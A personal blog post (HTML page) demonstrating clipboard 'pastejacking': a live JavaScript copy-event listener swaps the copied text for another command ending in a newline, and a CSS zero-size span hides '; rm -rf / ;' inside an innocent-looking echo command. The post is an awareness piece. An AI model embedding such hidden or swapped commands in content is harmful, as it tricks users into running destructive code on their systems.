<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />

    <title>Savvy - For everything technical and interesting</title>
    <meta name="description" content="another blog" />

    <meta name="HandheldFriendly" content="True" />
    <meta name="MobileOptimized" content="320" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="stylesheet" type="text/css" href="/savvy/assets/css/screen.css" />
    <link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Merriweather:300,700,700italic,300italic|Open+Sans:700,400" />
    <!-- Customisation  -->
    <link rel="stylesheet" type="text/css" href="/savvy/assets/css/main.css " />

</head>
<body class="home-template">

    <header class="main-header post-head no-cover">
    <nav class="main-nav  clearfix">
        <a class="back-button icon-arrow-left" href="/savvy/">Home</a>
    </nav>
</header>

<main class="content" role="main">

    <article class="post">

        <header class="post-header">
            <h1 class="post-title">on Copy Paste</h1>
            <section class="post-meta">
                
                    on Hacking
                
                <time class="post-date" datetime="2020-05-29">29 May 2020</time>
            </section>
        </header>
        <br>

<!--         <header class="post-header">
            <a id="blog-logo" href="">
                
                    <span class="blog-title">Savvy</span>
                
            </a>
        </header> -->

        <!-- <span class="post-meta">
            <time datetime="2020-05-29">29 May 2020</time>
            
                on Hacking
            
        </span> -->

        <!-- <h1 class="post-title">on Copy Paste</h1> -->

        <section class="post-content">
            <p>Javascript is extremely powerful, to say the least. One of its often overlooked features is the <code class="language-plaintext highlighter-rouge">copy</code> event listener.</p>

<p>What damage can that do? Here, copy this ‘innocent’ command and paste it somewhere else.</p>

<p id="fakecopy"><code>$ echo "innocent text"</code></p>

<script>
 document.getElementById('fakecopy').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "This could\'ve be something malicious!😈"\n');
    e.preventDefault();
});
</script>

<p>The text you just copied even has an <code class="language-plaintext highlighter-rouge">Enter</code> character so the command will execute automatically and I will have control over this system before you can comprehend what just went down.</p>

<p>This is how the code works,</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">fakecopy</span><span class="dl">'</span><span class="p">).</span><span class="nx">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">copy</span><span class="dl">'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">e</span><span class="p">.</span><span class="nx">clipboardData</span><span class="p">.</span><span class="nx">setData</span><span class="p">(</span><span class="dl">'</span><span class="s1">text/plain</span><span class="dl">'</span><span class="p">,</span>
        <span class="dl">'</span><span class="s1">echo "This could</span><span class="se">\'</span><span class="s1">ve be something malicious!😈"</span><span class="se">\n</span><span class="dl">'</span><span class="p">);</span>
    <span class="nx">e</span><span class="p">.</span><span class="nx">preventDefault</span><span class="p">();</span>
<span class="p">});</span>
</code></pre></div></div>

<p>Think you’ll be safe if you disable your javascript? Sorry to burst your bubble but this can also be done with raw <code class="language-plaintext highlighter-rouge">CSS</code>.</p>

<p id="fakecopy"> <code>$ echo <span style="font-size: 0;">; rm -rf / ; echo </span>"looks safe to me!"</code></p>

<p>This is how that works,</p>

<div class="language-css highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">$</span> <span class="nt">echo</span> <span class="o">&lt;</span><span class="nt">span</span> <span class="nt">style</span><span class="o">=</span><span class="s1">"font-size: 0"</span><span class="o">&gt;;</span> <span class="nt">echo</span> <span class="s2">'malicious command'</span> <span class="o">;</span> <span class="nt">echo</span> <span class="o">&lt;/</span><span class="nt">span</span><span class="o">&gt;</span><span class="s1">"looks safe to me!"</span>
</code></pre></div></div>

        </section>

        

        <footer class="post-footer">
            <!-- If we want to display author's name and bio -->
            
                <figure class="author-image">
                    <a class="img" href="/savvy/" style="background-image: url(/savvy/assets/images/profile.png)">
                    <span class="hidden">Kaushik's Picture</span></a>
                </figure>
                <section class="author">
                    <!-- Author Name -->
                    <h4> Kaushik </h4>
                    <!-- Author Bio -->
                    <p>
                        Just like writing.
                    </p>
                </section>
            

            <!-- Share links section -->
            <section class="share">
    <h4>Share this post</h4>
    <a class="icon-twitter" href="http://twitter.com/share?text=on Copy Paste&amp;url=kaushik.me/hacking/2020/05/29/on-Copy-Paste.html"
        onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
        <span class="hidden">Twitter</span>
    </a>
    <a class="icon-facebook" href="https://www.facebook.com/sharer/sharer.php?u=kaushik.me/hacking/2020/05/29/on-Copy-Paste.html"
        onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
        <span class="hidden">Facebook</span>
    </a>
    <a class="icon-google-plus" href="https://plus.google.com/share?url=kaushik.me/hacking/2020/05/29/on-Copy-Paste.html"
       onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;">
        <span class="hidden">Google+</span>
    </a>
</section>

            <!-- Disqus comments -->
            

        </footer>

    </article>

</main>


    <script type="text/javascript" src="/savvy/assets/js/jquery-1.11.1.min.js"></script>
    <script type="text/javascript" src="/savvy/assets/js/jquery.fitvids.js"></script>
    <script type="text/javascript" src="/savvy/assets/js/index.js"></script>

</body>
</html>
